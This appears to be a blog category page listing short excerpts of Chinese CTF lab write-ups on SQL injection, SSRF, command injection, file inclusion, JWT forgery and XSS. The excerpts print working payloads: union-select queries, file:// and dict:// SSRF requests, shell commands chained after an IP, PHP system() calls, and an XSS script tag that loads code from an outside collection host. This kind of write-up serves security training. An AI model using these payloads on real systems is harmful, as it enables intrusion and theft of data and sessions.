CTF记录
文章平均质量分 62
练就完了
(∪.∪ )...zzz
这个作者很懒,什么都没留下…
展开
-
php反序列化复现——bugku 点login没反应
如题所示, 点login没反应查看源代码提交的时候要注意要把提示的参数去掉啊原创 2022-06-06 15:20:57 · 318 阅读 · 0 评论 -
CTFHUB-2020-虎符-Web-easy_login-Node.js-前端JWT
登录安全-伪造admin实现getflageasy_login输入用户名密码注册,在这个时候抓包{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZWNyZXRpZCI6MCwidXNlcm5hbWUiOiJhIiwicGFzc3dvcmQiOiJhIiwiaWF0IjoxNjIzNjAyMTgwfQ.VwHlxVpIwoAp8b5NrGjbN56rsZ3IDrt5N9i66aXSYTE"}获取flag 涉及到权限/controllers原创 2021-06-14 01:09:10 · 870 阅读 · 2 评论 -
CTFHUB-WEB-SSRF【11】POST请求 上传文件 FastCGI协议 Redis协议
!!!POST请求试一下`?url=file:///var/www/html/flag.php`根据提示从127.0.0.1 访问给服务器发送一个KEY,写POST包上传文件FastCGI协议Redis协议POST请求试一下?url=file:///var/www/html/flag.php根据提示从127.0.0.1 访问给服务器发送一个KEY,写POST包<!-- Debug: key=a977f452523073d3d7d2fd8bd41b5331-->这个是基础po原创 2021-06-13 18:36:32 · 957 阅读 · 1 评论 -
CTFHUB-WEB-SSRF【10】内网访问 伪协议读取文件 端口扫描
看我内网访问直接访问127.0.0.1/flag.php伪协议读取文件file:///var/www/html/flag.php端口扫描?url=dict://127.0.0.1:端口号burp 爆破内网访问直接访问127.0.0.1/flag.php?url=127.0.0.1/flag.phpctfhub{a10924e3925b415219119faa}伪协议读取文件file:///var/www/html/flag.php端口扫描?url=dict://127.0.0.1:原创 2021-06-13 17:16:57 · 764 阅读 · 0 评论 -
【CTF】java反序列-2020-网鼎杯-朱雀组-Web-think_java
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里(这个包抓错了,所以没有显示密码)/common/test/sqlDictdbName=myapp?a=’ union select (select pwd fromuser)#“tableDescribe”:“ctfhub_8978原创 2021-06-13 03:46:03 · 3609 阅读 · 3 评论 -
CTFHUB-WEB-RCE【08】命令注入
????命令注入源代码用IP传入IP&ls 查看文件IP&cat 查看内容过滤cat使用`\` `''` `""` `{任意无意义变量名}`等方法均可绕过过滤空格`$IFS` `$IFS$9` 重定向符`<`过滤目录分隔符; && 执行多条命令过滤运算符;综合过滤练习%0a命令注入源代码用IP传入IP&ls 查看文件1.1.1.1&lsIP&cat 查看内容1.1.1.1&cat 7096156205265.php过原创 2021-06-10 22:52:46 · 206 阅读 · 2 评论 -
CTFHUB-WEB-RCE【07】eval执行、文件包含
!!!坚持eval执行查看根目录文件查看下一级目录cat 命令读取文件文件包含构造playload 传参查看当前目录下文件下一级cat查看信息php://inputphp://input 伪协议相当于一个削弱post的方法抓包消息中<?php system("ls /");?><?php system("cat /flag_26957");?>读取源代码源代码提示flag的位置,并且限制使用伪协议php://filter 任意文件读取远程包含使用php://input 伪协议cat命原创 2021-06-10 22:11:31 · 445 阅读 · 0 评论 -
CTFHUB-WEB-文件上传【06】
无验证AntSword 下载、安装https://github.com/AntSwordProject/下载 antsword 和loader解压AntSword-Loader-v4.0.3-win32-x64.zip.exe 初始化,选择空文件已经下载了核心源码,就选择项目源码的文件夹。(如果只下载了加载器,选择一个空文件夹,加载器会自动帮你下载核心项目源码这个项目文件夹就是你以后需要备份的,存储着你的shell和shell内的资料。AntSword 使用添加数据提交一句原创 2021-06-10 19:22:10 · 304 阅读 · 0 评论 -
CTFHUB-WEB-XSS【05】反射型
XSS笔记反射型测试<script>alert(1)</script>注册XSS测试平台创建项目,默认模块网站名name后拼接JS语句http://challenge-656faecaaf5f2fc2.sandbox.ctfhub.com:10800/?name=<sCRiPt sRC=//xss.pt/LyVF></sCrIpT>XSS网站收到记录...原创 2021-06-10 14:34:39 · 135 阅读 · 0 评论 -
CTFHUB-WEB-SQL注入【04】整数、字符、报错注入、布尔盲注、时间盲注、cookie注入、UA注入、refer注入
字符型注入1. 输入1:1被引起12. ’ 提前闭合?id=1’ and 1=1–+3. 求列数?id=1’ order by 2–+4. 求数据库名?id=-1' union select database(),2--+5. 求表名?id=-1' union select group_concat(table_name) ,2 from information_schema.tables where table_schema='sqli' --+数据库名是sqli6.原创 2021-06-10 13:34:54 · 384 阅读 · 1 评论 -
CTFHUB-WEB-信息泄露+密码口令【02】 dirsearch 、Githack使用
目录遍历phpinfo备份文件下载网站源码原创 2021-06-08 22:48:10 · 888 阅读 · 1 评论 -
CTFHUB-WEB-SQL注入【03】手工 sqlmap
整数型注入手工注入union select # 联合查询,联合注入常用database() #回显当前连接的数据库version() #查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6group_concat() #把产生的同一分组中的值用,连接,形成一个字符串information_schema # 存了很多mysql信息的数据库information_schema.schemata # information_schema原创 2021-06-07 22:55:52 · 412 阅读 · 0 评论 -
CTFHUB-WEB-前置技能【01】
302跳转天知道我的burp安了几次,证书安了也打不开,被迫安1.6cookie改成1 放回去 得到基础认证真强啊 !按钮不给放出来原创 2021-06-07 11:27:24 · 108 阅读 · 0 评论